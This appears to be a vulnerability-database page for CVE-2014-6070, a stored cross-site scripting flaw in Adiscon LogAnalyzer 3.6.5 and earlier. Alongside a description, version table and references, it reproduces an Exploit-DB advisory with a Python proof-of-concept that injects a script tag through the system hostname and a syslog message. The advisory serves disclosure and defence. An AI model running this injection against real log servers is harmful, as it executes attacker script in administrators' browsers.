CVE-2014-6070
Description
Multiple cross-site scripting (XSS) vulnerabilities in Adiscon LogAnalyzer before 3.6.6 allow remote attackers to inject arbitrary web script or HTML via the hostname in (1) index.php or (2) detail.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting
Vulnerability title: Syslog LogAnalyzer 3.6.5 Stored XSS
Author: Dolev Farhi
Contact: dolevf at yahoo dot com @dolevff
Application: LogAnalyzer 3.6.5
Date: 8.2.2014
Relevant CVEs: CVE-2014-6070
Vulnerable version: <= 3.6.5
Fixed version: 3.6.6
1. About the application
------------------------
LogAnalyzer is a web interface to syslog and other network event data.
It provides easy browsing, analysis of realtime network events and
reporting services.
2. Vulnerabilities Descriptions:
-----------------------------
It was found that an XSS injection is possible on a syslog server
running LogAnalyzer version 3.6.5.
by changing the hostname of any entity logging to syslog server with
LogAnalyzer to <script>alert("xss")</script>, and sending an arbitrary
syslog message, a client-side script injection execution is possible.
4. proof of concept exploit
-----------------------
#!/usr/bin/python
# Exploit title = LogAnalyzer 3.5.6 Stored XSS injection
# Date: Sept 2014
# CVE: 2014-6070
# Tested on RHEL6.4
import os
import syslog
hostname = os.uname()[1]
payload = "\"<script>alert('XSS');</script>\""
print("+ Setting temporary hostname to " + payload + "...")
os.system("hostname " + payload)
print("+ Injecting the syslog message...")
syslog.syslog("syslog xss injection")
print("+ Check LogAnalyzer dashboard...")
raw_input("+ Press [enter] to restore hostname...")
os.system("hostname " + "\"" + hostname + "\"")
print("+ Hostname restored to " + hostname)Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| adiscon | loganalyzer | {"endIncluding":"3.6.5"} | |
| adiscon | loganalyzer | 3.6.0 | |
| adiscon | loganalyzer | 3.6.1 | |
| adiscon | loganalyzer | 3.6.2 | |
| adiscon | loganalyzer | 3.6.3 | |
| adiscon | loganalyzer | 3.6.4 | |
References
- http://loganalyzer.adiscon.com/downloads/loganalyzer-3-6-6-v3-stable
- http://packetstormsecurity.com/files/128121/LogAnalyzer-3.6.5-Cross-Site-Scripting.html
- http://seclists.org/fulldisclosure/2014/Sep/17
- http://www.exploit-db.com/exploits/34525
- https://exchange.xforce.ibmcloud.com/vulnerabilities/95677
- http://loganalyzer.adiscon.com/downloads/loganalyzer-3-6-6-v3-stable
- http://packetstormsecurity.com/files/128121/LogAnalyzer-3.6.5-Cross-Site-Scripting.html
- http://seclists.org/fulldisclosure/2014/Sep/17
- http://www.exploit-db.com/exploits/34525
- https://exchange.xforce.ibmcloud.com/vulnerabilities/95677
CWEs
CWE-79
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.